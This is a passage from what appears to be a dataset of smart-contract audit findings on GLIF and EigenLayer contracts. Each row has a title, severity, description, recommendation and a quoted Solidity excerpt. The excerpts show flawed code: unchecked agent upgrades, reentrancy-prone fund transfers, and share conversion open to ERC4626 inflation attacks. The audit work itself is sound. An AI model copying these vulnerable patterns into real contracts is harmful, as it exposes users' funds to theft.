oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n\\nThe issue is that the owner can trigger the upgrade even if no new implementation exists. Multiple possible problems derive from it.\\nUpgrading to the current implementation of the Agent will break the logic because the current version is not calling the `migrateMiner` function, so all the miners will stay with the old Agent, and their funds will be lost.\\nThe owner can accidentally trigger multiple upgrades simultaneously, leading to a loss of funds (https://github.com/ConsenSysDiligence/glif-audit-2023-04/issues/2).\\nThe owner also has no control over the new version of the Agent. To increase decentralization, it's better to pass the deployer's address as a parameter additionally.чEnsure the upgrades can only happen when there is a new version of an Agent, and the owner controls this version.чч```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n -Potential Re-Entrancy Issues When Upgrading the ContractsчlowчThe protocol doesn't have any built-in re-entrancy protection mechanisms. 
That mainly explains by using the `wFIL` token, which is not supposed to give that opportunity. And also by carefully using `FIL` transfers.\\nHowever, there are some places in the code where things may go wrong in the future. For example, when upgrading an Agent:\\n```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n\\nHere, we see the `oldAgent.decommissionAgent(newAgent);` call happens before the `oldAgent` is deleted. Inside this function, we see:\\n```\\nfunction decommissionAgent(address \\_newAgent) external {\\n // only the agent factory can decommission an agent\\n AuthController.onlyAgentFactory(router, msg.sender);\\n // if the newAgent has a mismatching ID, revert\\n if(IAgent(\\_newAgent).id() != id) revert Unauthorized();\\n // set the newAgent in storage, which marks the upgrade process as starting\\n newAgent = \\_newAgent;\\n uint256 \\_liquidAssets = liquidAssets();\\n // Withdraw all liquid funds from the Agent to the newAgent\\n \\_poolFundsInFIL(\\_liquidAssets);\\n // transfer funds to new agent\\n payable(\\_newAgent).sendValue(\\_liquidAssets);\\n}\\n```\\n\\nHere, the FIL is transferred to a new contract which is currently unimplemented and unknown. 
Potentially, the fallback function of this contract could trigger a re-entrancy attack. If that's the case, during the execution of this function, there will be two contracts that are active agents with the same ID, and the attacker can try to use that maliciously.чBe very cautious with further implementations of agents and pools. Also, consider using reentrancy protection in public functions.чч```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n -InfinityPool Is Subject to a Donation With Inflation Attack if Emptied.чlowчSince `InfinityPool` is an implementation of the ERC4626 vault, it too is susceptible to inflation attacks. An attacker could front-run the first deposit and inflate the share price to an extent where the following deposit will be less than the value of 1 wei of share, resulting in 0 shares minted. The attacker could conduct the inflation by means of self-destructing another contract. In the case of GLIF this attack is less likely on the first pool since the GLIF team accepts predeposits so some amount of shares was already minted. 
We do suggest fixing this issue before the next pool is deployed and no pre-stake is generated.\\n```\\n/\\*//////////////////////////////////////////////////////////////\\n 4626 LOGIC\\n//////////////////////////////////////////////////////////////\\*/\\n\\n/\\*\\*\\n \\* @dev Converts `assets` to shares\\n \\* @param assets The amount of assets to convert\\n \\* @return shares - The amount of shares converted from assets\\n \\*/\\nfunction convertToShares(uint256 assets) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets \\* supply / totalAssets();\\n}\\n\\n/\\*\\*\\n \\* @dev Converts `shares` to assets\\n \\* @param shares The amount of shares to convert\\n \\* @return assets - The amount of assets converted from shares\\n \\*/\\nfunction convertToAssets(uint256 shares) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? shares : shares \\* totalAssets() / supply;\\n}\\n```\\nчSince the pool does not need to accept donations, the easiest way to handle this case is to use virtual price, where the balance of the contract is duplicated in a separate variable.чч```\\n/\\*//////////////////////////////////////////////////////////////\\n 4626 LOGIC\\n//////////////////////////////////////////////////////////////\\*/\\n\\n/\\*\\*\\n \\* @dev Converts `assets` to shares\\n \\* @param assets The amount of assets to convert\\n \\* @return shares - The amount of shares converted from assets\\n \\*/\\nfunction convertToShares(uint256 assets) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? 
assets : assets \\* supply / totalAssets();\\n}\\n\\n/\\*\\*\\n \\* @dev Converts `shares` to assets\\n \\* @param shares The amount of shares to convert\\n \\* @return assets - The amount of assets converted from shares\\n \\*/\\nfunction convertToAssets(uint256 shares) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? shares : shares \\* totalAssets() / supply;\\n}\\n```\\n -MaxWithdraw Should Potentially Account for the Funds Available in the Ramp.чlowчSince `InfinityPool` is ERC4626 it should also support the `MaxWithdraw` method. According to the EIP it should include any withdrawal limitation that the participant could encounter. At the moment the `MaxWithdraw` function returns the maximum amount of IOU tokens rather than WFIL. Since IOU token is not the `asset` token of the vault, this behavior is not ideal.\\n```\\nfunction maxWithdraw(address owner) public view returns (uint256) {\\n return convertToAssets(liquidStakingToken.balanceOf(owner));\\n}\\n```\\nчWe suggest considering returning the maximum amount of WFIL withdrawal which should account for Ramp balance.чч```\\nfunction maxWithdraw(address owner) public view returns (uint256) {\\n return convertToAssets(liquidStakingToken.balanceOf(owner));\\n}\\n```\\n -The Upgradeability of MinerRegistry, AgentPolice, and Agent Is Overcomplicated and Has a High Chance of Errors. AcknowledgedчlowчDuring the engagement, we have identified a few places that signify that the `Agent`, `MinerRegistry` and `AgentPolice` can be upgraded, for example:\\nAbility to migrate the miner from one version of the Agent to another inside the `migrateMiner`.\\nAbility to `refreshRoutes` that would update the `AgentPolice` and `MinerRegistry` addresses for a given Agent.\\nAbility to `decommission` pool. We believe that while this functionality is present, it is not very well thought through. 
For example, both `MinerRegistry` and `AgentPolice` are not upgradable but have mappings inside of them.\\n```\\nmapping(uint256 => bool) public liquidated;\\n\\n/// @notice `\\_poolIDs` maps agentID to the pools they have actively borrowed from\\nmapping(uint256 => uint256[]) private \\_poolIDs;\\n\\n/// @notice `\\_credentialUseBlock` maps signature bytes to when a credential was used\\nmapping(bytes32 => uint256) private \\_credentialUseBlock;\\n\\n/// @notice `\\_agentBeneficiaries` maps an Agent ID to its Beneficiary struct\\nmapping(uint256 => AgentBeneficiary) private \\_agentBeneficiaries;\\n```\\n\\n```\\nmapping(bytes32 => bool) private \\_minerRegistered;\\n\\nmapping(uint256 => uint64[]) private \\_minersByAgent;\\n```\\n\\nThat means that any time these contracts would need to be upgraded, the contents of those mappings will need to be somehow recreated in the new contract. That is not trivial since it is not easy to obtain all values of a mapping. This will also require an additional protocol-controlled setter ala kickstart mapping functions that are not ideal.\\nIn the case of `Agent` if the contract was upgradable there would be no need for a process of migrating miners that can be tedious and opens possibilities for errors. Since protocol has a lot of centralization and trust assumptions already, having upgradability will not contribute to it a lot.\\nWe also believe that during the upgrade of the pool, the PoolToken will stay the same in the new pool. That means that the minting and burning permissions of the share tokens have to be carefully updated or checked in a manner that does not require the address of the pool to be constant. 
Since we did not have access to this file, we cannot check if that is done correctly.чConsider using upgradable contracts or have a solid upgrade plan that is well-tested before an emergency situation occurs.чч```\\nmapping(uint256 => bool) public liquidated;\\n\\n/// @notice `\\_poolIDs` maps agentID to the pools they have actively borrowed from\\nmapping(uint256 => uint256[]) private \\_poolIDs;\\n\\n/// @notice `\\_credentialUseBlock` maps signature bytes to when a credential was used\\nmapping(bytes32 => uint256) private \\_credentialUseBlock;\\n\\n/// @notice `\\_agentBeneficiaries` maps an Agent ID to its Beneficiary struct\\nmapping(uint256 => AgentBeneficiary) private \\_agentBeneficiaries;\\n```\\n -Mint Function in the Infinity Pool Will Emit the Incorrect Value.чlowчIn the `InfinityPool` file the `mint` function recomputes the amount of the assets before emitting the event. While this is fine in a lot of cases, that will not always be true. The result of `previewMint` and `convertToAssets` will only be equal while the `totalAssets` and `totalSupply` are equal. 
For example, this assumption will break after the first liquidation.\\n```\\nfunction mint(uint256 shares, address receiver) public isOpen returns (uint256 assets) {\\n if(shares == 0) revert InvalidParams();\\n // These transfers need to happen before the mint, and this is forcing a higher degree of coupling than is ideal\\n assets = previewMint(shares);\\n asset.transferFrom(msg.sender, address(this), assets);\\n liquidStakingToken.mint(receiver, shares);\\n assets = convertToAssets(shares);\\n emit Deposit(msg.sender, receiver, assets, shares);\\n}\\n```\\nчUse the `assets` value computed by the `previewMint` when emitting the event.чч```\\nfunction mint(uint256 shares, address receiver) public isOpen returns (uint256 assets) {\\n if(shares == 0) revert InvalidParams();\\n // These transfers need to happen before the mint, and this is forcing a higher degree of coupling than is ideal\\n assets = previewMint(shares);\\n asset.transferFrom(msg.sender, address(this), assets);\\n liquidStakingToken.mint(receiver, shares);\\n assets = convertToAssets(shares);\\n emit Deposit(msg.sender, receiver, assets, shares);\\n}\\n```\\n -Potential Overpayment Due to Rounding Imprecision Won't FixчlowчInside the `InfinityPool` the `pay` function might accept unaccounted FIL. Imagine a situation where an Agent is trying to repay only the fees portion of the debt. 
In that case, the following branch will be executed:\\n```\\nif (vc.value <= interestOwed) {\\n // compute the amount of epochs this payment covers\\n // vc.value is not WAD yet, so divWadDown cancels the extra WAD in interestPerEpoch\\n uint256 epochsForward = vc.value.divWadDown(interestPerEpoch);\\n // update the account's `epochsPaid` cursor\\n account.epochsPaid += epochsForward;\\n // since the entire payment is interest, the entire payment is used to compute the fee (principal payments are fee-free)\\n feeBasis = vc.value;\\n} else {\\n```\\n\\nThe issue is if the `value` does not divide by the `interestPerEpoch` exactly, any remainder will remain in the InfinityPool.\\n```\\nuint256 epochsForward = vc.value.divWadDown(interestPerEpoch);\\n```\\nчSince the remainder will most likely not be too large this is not critical, but ideally, those remaining funds would be included in the `refund` variable.чч```\\nif (vc.value <= interestOwed) {\\n // compute the amount of epochs this payment covers\\n // vc.value is not WAD yet, so divWadDown cancels the extra WAD in interestPerEpoch\\n uint256 epochsForward = vc.value.divWadDown(interestPerEpoch);\\n // update the account's `epochsPaid` cursor\\n account.epochsPaid += epochsForward;\\n // since the entire payment is interest, the entire payment is used to compute the fee (principal payments are fee-free)\\n feeBasis = vc.value;\\n} else {\\n```\\n -jumpStartAccount Should Be Subject to the Same Approval Checks as Regular Borrow.чlowч`InfinityPool` contract has the ability to kick start an account that will have a debt position in this pool.\\n```\\nfunction jumpStartAccount(address receiver, uint256 agentID, uint256 accountPrincipal) external onlyOwner {\\n Account memory account = \\_getAccount(agentID);\\n // if the account is already initialized, revert\\n if (account.principal != 0) revert InvalidState();\\n // create the account\\n account.principal = accountPrincipal;\\n account.startEpoch = block.number;\\n 
account.epochsPaid = block.number;\\n // save the account\\n account.save(router, agentID, id);\\n // add the pool to the agent's list of borrowed pools\\n GetRoute.agentPolice(router).addPoolToList(agentID, id);\\n // mint the iFIL to the receiver, using principal as the deposit amount\\n liquidStakingToken.mint(receiver, convertToShares(accountPrincipal));\\n // account for the new principal in the total borrowed of the pool\\n totalBorrowed += accountPrincipal;\\n}\\n```\\nчWe suggest that this action is subject to the same rules as the standard borrow action. Thus checks on DTE, LTV and DTI should be done if possible.чч```\\nfunction jumpStartAccount(address receiver, uint256 agentID, uint256 accountPrincipal) external onlyOwner {\\n Account memory account = \\_getAccount(agentID);\\n // if the account is already initialized, revert\\n if (account.principal != 0) revert InvalidState();\\n // create the account\\n account.principal = accountPrincipal;\\n account.startEpoch = block.number;\\n account.epochsPaid = block.number;\\n // save the account\\n account.save(router, agentID, id);\\n // add the pool to the agent's list of borrowed pools\\n GetRoute.agentPolice(router).addPoolToList(agentID, id);\\n // mint the iFIL to the receiver, using principal as the deposit amount\\n liquidStakingToken.mint(receiver, convertToShares(accountPrincipal));\\n // account for the new principal in the total borrowed of the pool\\n totalBorrowed += accountPrincipal;\\n}\\n```\\n -Potential Reentrancy Into StrategiesчmediumчThe `StrategyManager` contract is the entry point for deposits into and withdrawals from strategies. More specifically, to `deposit` into a strategy, a staker calls `depositIntoStrategy` (or anyone calls `depositIntoStrategyWithSignature` with the staker's signature) then the asset is transferred from the staker to the strategy contract. After that, the strategy's `deposit` function is called, followed by some bookkeeping in the `StrategyManager`. 
For withdrawals (and slashing), the `StrategyManager` calls the strategy's `withdraw` function, which transfers the given amount of the asset to the given recipient. Both token transfers are a potential source of reentrancy if the token allows it.\\nThe `StrategyManager` uses OpenZeppelin's `ReentrancyGuardUpgradeable` as reentrancy protection, and the relevant functions have a `nonReentrant` modifier. The `StrategyBase` contract - from which concrete strategies should be derived - does not have reentrancy protection. However, the functions `deposit` and `withdraw` can only be called from the `StrategyManager`, so reentering these is impossible.\\nNevertheless, other functions could be reentered, for example, `sharesToUnderlyingView` and `underlyingToSharesView`, as well as their (supposedly) non-view counterparts.\\nLet's look at the `withdraw` function in `StrategyBase`. First, the `amountShares` shares are burnt, and at the end of the function, the equivalent amount of `token` is transferred to the depositor:\\n```\\nfunction withdraw(address depositor, IERC20 token, uint256 amountShares)\\n external\\n virtual\\n override\\n onlyWhenNotPaused(PAUSED\\_WITHDRAWALS)\\n onlyStrategyManager\\n{\\n require(token == underlyingToken, \"StrategyBase.withdraw: Can only withdraw the strategy token\");\\n // copy `totalShares` value to memory, prior to any decrease\\n uint256 priorTotalShares = totalShares;\\n require(\\n amountShares <= priorTotalShares,\\n \"StrategyBase.withdraw: amountShares must be less than or equal to totalShares\"\\n );\\n\\n // Calculate the value that `totalShares` will decrease to as a result of the withdrawal\\n uint256 updatedTotalShares = priorTotalShares - amountShares;\\n // check to avoid edge case where share rate can be massively inflated as a 'griefing' sort of attack\\n require(updatedTotalShares >= MIN\\_NONZERO\\_TOTAL\\_SHARES || updatedTotalShares == 0,\\n \"StrategyBase.withdraw: updated totalShares amount would be nonzero but 
below MIN\\_NONZERO\\_TOTAL\\_SHARES\");\\n // Actually decrease the `totalShares` value\\n totalShares = updatedTotalShares;\\n\\n /\\*\\*\\n \\* @notice calculation of amountToSend \\*mirrors\\* `sharesToUnderlying(amountShares)`, but is different since the `totalShares` has already\\n \\* been decremented. Specifically, notice how we use `priorTotalShares` here instead of `totalShares`.\\n \\*/\\n uint256 amountToSend;\\n if (priorTotalShares == amountShares) {\\n amountToSend = \\_tokenBalance();\\n } else {\\n amountToSend = (\\_tokenBalance() \\* amountShares) / priorTotalShares;\\n }\\n\\n underlyingToken.safeTransfer(depositor, amountToSend);\\n}\\n```\\n\\nIf we assume that the `token` contract has a callback to the recipient of the transfer before the actual balance changes take place, then the recipient could reenter the strategy contract, for example, in sharesToUnderlyingView:\\n```\\nfunction sharesToUnderlyingView(uint256 amountShares) public view virtual override returns (uint256) {\\n if (totalShares == 0) {\\n return amountShares;\\n } else {\\n return (\\_tokenBalance() \\* amountShares) / totalShares;\\n }\\n}\\n```\\n\\nThe crucial point is: If the callback is executed before the actual balance change, then `sharesToUnderlyingView` will report a bad result because the shares have already been burnt. 
Still, the token balance has not been updated yet.\\nFor deposits, the token transfer to the strategy happens first, and the shares are minted after that:\\n```\\nfunction \\_depositIntoStrategy(address depositor, IStrategy strategy, IERC20 token, uint256 amount)\\n internal\\n onlyStrategiesWhitelistedForDeposit(strategy)\\n returns (uint256 shares)\\n{\\n // transfer tokens from the sender to the strategy\\n token.safeTransferFrom(msg.sender, address(strategy), amount);\\n\\n // deposit the assets into the specified strategy and get the equivalent amount of shares in that strategy\\n shares = strategy.deposit(token, amount);\\n```\\n\\n```\\nfunction deposit(IERC20 token, uint256 amount)\\n external\\n virtual\\n override\\n onlyWhenNotPaused(PAUSED\\_DEPOSITS)\\n onlyStrategyManager\\n returns (uint256 newShares)\\n{\\n require(token == underlyingToken, \"StrategyBase.deposit: Can only deposit underlyingToken\");\\n\\n /\\*\\*\\n \\* @notice calculation of newShares \\*mirrors\\* `underlyingToShares(amount)`, but is different since the balance of `underlyingToken`\\n \\* has already been increased due to the `strategyManager` transferring tokens to this strategy prior to calling this function\\n \\*/\\n uint256 priorTokenBalance = \\_tokenBalance() - amount;\\n if (priorTokenBalance == 0 || totalShares == 0) {\\n newShares = amount;\\n } else {\\n newShares = (amount \\* totalShares) / priorTokenBalance;\\n }\\n\\n // checks to ensure correctness / avoid edge case where share rate can be massively inflated as a 'griefing' sort of attack\\n require(newShares != 0, \"StrategyBase.deposit: newShares cannot be zero\");\\n uint256 updatedTotalShares = totalShares + newShares;\\n require(updatedTotalShares >= MIN\\_NONZERO\\_TOTAL\\_SHARES,\\n \"StrategyBase.deposit: updated totalShares amount would be nonzero but below MIN\\_NONZERO\\_TOTAL\\_SHARES\");\\n\\n // update total share amount\\n totalShares = updatedTotalShares;\\n return newShares;\\n}\\n```\\n\\nThat 
means if there is a callback in the token's `transferFrom` function and it is executed after the balance change, a reentering call to `sharesToUnderlyingView` (for example) will again return a wrong result because shares and token balances are not “in sync.”\\nIn addition to the reversed order of token transfer and shares update, there's another vital difference between `withdraw` and deposit: For withdrawals, the call to the token contract originates in the strategy, while for deposits, it is the strategy manager that initiates the call to the token contract (before calling into the strategy). That's a technicality that has consequences for reentrancy protection: Note that for withdrawals, it is the strategy contract that is reentered, while for deposits, there is not a single contract that is reentered; instead, it is the contract system that is in an inconsistent state when the reentrancy happens. Hence, reentrancy protection on the level of individual contracts is not sufficient.\\nFinally, we want to discuss though which functions in the strategy contract the system could be reentered. As mentioned, `deposit` and `withdraw` can only be called by the strategy manager, so these two can be ruled out. For the examples above, we considered `sharesToUnderlyingView`, which (as the name suggests) is a `view` function. As such, it can't change the state of the contract, so reentrancy through a `view` function can only be a problem for other contracts that use this function and rely on its return value. However, there is also a potentially state-changing variant, `sharesToUnderlying`, and similar potentially state-changing functions, such as `underlyingToShares` and `userUnderlying`. Currently, these functions are not actually state-changing, but the idea is that they could be and, in some concrete strategy implementations that inherit from `StrategyBase`, will be. 
In such cases, these functions could make wrong state changes due to state inconsistency during reentrancy.\\nThe examples above assume that the token contract allows reentrancy through its `transfer` function before the balance change has been made or in its `transferFrom` function after. It might be tempting to argue that tokens which don't fall into this category are safe to use. While the examples discussed above are the most interesting attack vectors we found, there might still be others: To illustrate this point, assume a token contract that allows reentrancy through `transferFrom` only before any state change in the token takes place. The token `transfer` is the first thing that happens in `StrategyManager._depositIntoStrategy`, and the state changes (user shares) and calling the strategy's `deposit` function occur later, this might look safe. However, if the `deposit` happens via `StrategyManager.depositIntoStrategyWithSignature`, then it can be seen, for example, that the staker's nonce is updated before the internal `_depositIntoStrategy` function is called:\\n```\\nfunction depositIntoStrategyWithSignature(\\n IStrategy strategy,\\n IERC20 token,\\n uint256 amount,\\n address staker,\\n uint256 expiry,\\n bytes memory signature\\n)\\n external\\n onlyWhenNotPaused(PAUSED\\_DEPOSITS)\\n onlyNotFrozen(staker)\\n nonReentrant\\n returns (uint256 shares)\\n{\\n require(\\n expiry >= block.timestamp,\\n \"StrategyManager.depositIntoStrategyWithSignature: signature expired\"\\n );\\n // calculate struct hash, then increment `staker`'s nonce\\n uint256 nonce = nonces[staker];\\n bytes32 structHash = keccak256(abi.encode(DEPOSIT\\_TYPEHASH, strategy, token, amount, nonce, expiry));\\n unchecked {\\n nonces[staker] = nonce + 1;\\n }\\n bytes32 digestHash = keccak256(abi.encodePacked(\"\\x19\\x01\", DOMAIN\\_SEPARATOR, structHash));\\n\\n\\n /\\*\\*\\n \\* check validity of signature:\\n \\* 1) if `staker` is an EOA, then `signature` must be a valid ECSDA 
signature from `staker`,\\n \\* indicating their intention for this action\\n \\* 2) if `staker` is a contract, then `signature` must will be checked according to EIP-1271\\n \\*/\\n if (Address.isContract(staker)) {\\n require(IERC1271(staker).isValidSignature(digestHash, signature) == ERC1271\\_MAGICVALUE,\\n \"StrategyManager.depositIntoStrategyWithSignature: ERC1271 signature verification failed\");\\n } else {\\n require(ECDSA.recover(digestHash, signature) == staker,\\n \"StrategyManager.depositIntoStrategyWithSignature: signature not from staker\");\\n }\\n\\n shares = \\_depositIntoStrategy(staker, strategy, token, amount);\\n}\\n```\\n\\nHence, querying the staker's nonce in reentrancy would still give a result based on an “incomplete state change.” It is, for example, conceivable that the staker still has zero shares, and yet their nonce is already 1. This particular situation is most likely not an issue, but the example shows that reentrancy can be subtle.чThis is fine if the token doesn't allow reentrancy in the first place. As discussed above, among the tokens that do allow reentrancy, some variants of when reentrancy can happen in relation to state changes in the token seem more dangerous than others, but we have also argued that this kind of reasoning can be dangerous and error-prone. Hence, we recommend employing comprehensive and defensive reentrancy protection based on reentrancy guards such as OpenZeppelin's ReentrancyGuardUpgradeable, which is already used in the `StrategyManager`.\\nUnfortunately, securing a multi-contract system against reentrancy can be challenging, but we hope the preceding discussion and the following pointers will prove helpful:\\nExternal functions in strategies that should only be callable by the strategy manager (such as `deposit` and withdraw) should have the `onlyStrategyManager` modifier. 
This is already the case in the current codebase and is listed here only for completeness.\\nExternal functions in strategies for which item 1 doesn't apply (such as `sharesToUnderlying` and underlyingToShares) should query the strategy manager's reentrancy lock and revert if it is set.\\nIn principle, the restrictions above also apply to `public` functions, but if a `public` function is also used internally, checks against reentrancy can cause problems (if used in an `internal` context) or at least be redundant. In the context of reentrancy protection, it is often easier to split `public` functions into an `internal` and an `external` one.\\nIf `view` functions are supposed to give reliable results (either internally - which is typically the case - or for other contracts), they have to be protected too.\\nThe previous item also applies to the StrategyManager: `view` functions that provide correct results should query the reentrancy lock and revert if it is set.\\nSolidity automatically generates getters for `public` state variables. Again, if these (external view) functions must deliver correct results, the same measures must be taken for explicit `view` functions. In practice, the state variable has to become `internal` or `private`, and the getter function must be hand-written.\\nThe `StrategyBase` contract provides some basic functionality. Concrete strategy implementations can inherit from this contract, meaning that some functions may be overridden (and might or might not call the overridden version via super), and new functions might be added. While the guidelines above should be helpful, derived contracts must be reviewed and assessed separately on a case-by-case basis. 
As mentioned before, reentrancy protection can be challenging, especially in a multi-contract system.чч```\\nfunction withdraw(address depositor, IERC20 token, uint256 amountShares)\\n external\\n virtual\\n override\\n onlyWhenNotPaused(PAUSED\\_WITHDRAWALS)\\n onlyStrategyManager\\n{\\n require(token == underlyingToken, \"StrategyBase.withdraw: Can only withdraw the strategy token\");\\n // copy `totalShares` value to memory, prior to any decrease\\n uint256 priorTotalShares = totalShares;\\n require(\\n amountShares <= priorTotalShares,\\n \"StrategyBase.withdraw: amountShares must be less than or equal to totalShares\"\\n );\\n\\n // Calculate the value that `totalShares` will decrease to as a result of the withdrawal\\n uint256 updatedTotalShares = priorTotalShares - amountShares;\\n // check to avoid edge case where share rate can be massively inflated as a 'griefing' sort of attack\\n require(updatedTotalShares >= MIN\\_NONZERO\\_TOTAL\\_SHARES || updatedTotalShares == 0,\\n \"StrategyBase.withdraw: updated totalShares amount would be nonzero but below MIN\\_NONZERO\\_TOTAL\\_SHARES\");\\n // Actually decrease the `totalShares` value\\n totalShares = updatedTotalShares;\\n\\n /\\*\\*\\n \\* @notice calculation of amountToSend \\*mirrors\\* `sharesToUnderlying(amountShares)`, but is different since the `totalShares` has already\\n \\* been decremented. 
Specifically, notice how we use `priorTotalShares` here instead of `totalShares`.\\n \\*/\\n uint256 amountToSend;\\n if (priorTotalShares == amountShares) {\\n amountToSend = \\_tokenBalance();\\n } else {\\n amountToSend = (\\_tokenBalance() \\* amountShares) / priorTotalShares;\\n }\\n\\n underlyingToken.safeTransfer(depositor, amountToSend);\\n}\\n```\\n -StrategyBase - Inflation Attack Prevention Can Lead to Stuck FundsчlowчAs a defense against what has come to be known as inflation or donation attack in the context of ERC-4626, the `StrategyBase` contract - from which concrete strategy implementations are supposed to inherit - enforces that the amount of shares in existence for a particular strategy is always either 0 or at least a certain minimum amount that is set to 10^9. This mitigates inflation attacks, which require a small total supply of shares to be effective.\\n```\\nuint256 updatedTotalShares = totalShares + newShares;\\nrequire(updatedTotalShares >= MIN\\_NONZERO\\_TOTAL\\_SHARES,\\n \"StrategyBase.deposit: updated totalShares amount would be nonzero but below MIN\\_NONZERO\\_TOTAL\\_SHARES\");\\n```\\n\\n```\\n// Calculate the value that `totalShares` will decrease to as a result of the withdrawal\\nuint256 updatedTotalShares = priorTotalShares - amountShares;\\n// check to avoid edge case where share rate can be massively inflated as a 'griefing' sort of attack\\nrequire(updatedTotalShares >= MIN\\_NONZERO\\_TOTAL\\_SHARES || updatedTotalShares == 0,\\n \"StrategyBase.withdraw: updated totalShares amount would be nonzero but below MIN\\_NONZERO\\_TOTAL\\_SHARES\");\\n```\\n\\nThis particular approach has the downside that, in the worst case, a user may be unable to withdraw the underlying asset for up to 10^9 - 1 shares. 
While the extreme circumstances under which this can happen might be unlikely to occur in a realistic setting and, in many cases, the value of 10^9 - 1 shares may be negligible, this is not ideal.чIt isn't easy to give a good general recommendation. None of the suggested mitigations are without a downside, and what's the best choice may also depend on the specific situation. We do, however, feel that alternative approaches that can't lead to stuck funds might be worth considering, especially for a default implementation.\\nOne option is internal accounting, i.e., the strategy keeps track of the number of underlying tokens it owns. It uses this number for conversion rate calculation instead of its balance in the token contract. This avoids the donation attack because sending tokens directly to the strategy will not affect the conversion rate. Moreover, this technique helps prevent reentrancy issues when the EigenLayer state is out of sync with the token contract's state. The downside is higher gas costs and that donating by just sending tokens to the contract is impossible; more specifically, if it happens accidentally, the funds are lost unless there's some special mechanism to recover them.\\nAn alternative approach with virtual shares and assets is presented here, and the document lists pointers to more discussions and proposed solutions.чч```\\nuint256 updatedTotalShares = totalShares + newShares;\\nrequire(updatedTotalShares >= MIN\\_NONZERO\\_TOTAL\\_SHARES,\\n \"StrategyBase.deposit: updated totalShares amount would be nonzero but below MIN\\_NONZERO\\_TOTAL\\_SHARES\");\\n```\\n -StrategyWrapper - Functions Shouldn't Be virtual (Out of Scope)чlowчThe `StrategyWrapper` contract is a straightforward strategy implementation and - as its NatSpec documentation explicitly states - is not designed to be inherited from:\\n```\\n/\\*\\*\\n \\* @title Extremely simple implementation of `IStrategy` interface.\\n \\* @author Layr Labs, Inc.\\n \\* @notice Simple, basic, 
\"do-nothing\" Strategy that holds a single underlying token and returns it on withdrawals.\\n \\* Assumes shares are always 1-to-1 with the underlyingToken.\\n \\* @dev Unlike `StrategyBase`, this contract is \\*not\\* designed to be inherited from.\\n \\* @dev This contract is expressly \\*not\\* intended for use with 'fee-on-transfer'-type tokens.\\n \\* Setting the `underlyingToken` to be a fee-on-transfer token may result in improper accounting.\\n \\*/\\ncontract StrategyWrapper is IStrategy {\\n```\\n\\nHowever, all functions in this contract are `virtual`, which only makes sense if inheriting from `StrategyWrapper` is possible.чAssuming the NatSpec documentation is correct, and no contract should inherit from `StrategyWrapper`, remove the `virtual` keyword from all function definitions. Otherwise, fix the documentation.\\nRemark\\nThis contract is out of scope, and this finding is only included because we noticed it accidentally. This does not mean we have reviewed the contract or other out-of-scope files.чч```\\n/\\*\\*\\n \\* @title Extremely simple implementation of `IStrategy` interface.\\n \\* @author Layr Labs, Inc.\\n \\* @notice Simple, basic, \"do-nothing\" Strategy that holds a single underlying token and returns it on withdrawals.\\n \\* Assumes shares are always 1-to-1 with the underlyingToken.\\n \\* @dev Unlike `StrategyBase`, this contract is \\*not\\* designed to be inherited from.\\n \\* @dev This contract is expressly \\*not\\* intended for use with 'fee-on-transfer'-type tokens.\\n \\* Setting the `underlyingToken` to be a fee-on-transfer token may result in improper accounting.\\n \\*/\\ncontract StrategyWrapper is IStrategy {\\n```\\n -StrategyBase - Inheritance-Related IssuesчlowчA. The `StrategyBase` contract defines `view` functions that, given an amount of shares, return the equivalent amount of tokens (sharesToUnderlyingView) and vice versa (underlyingToSharesView). 
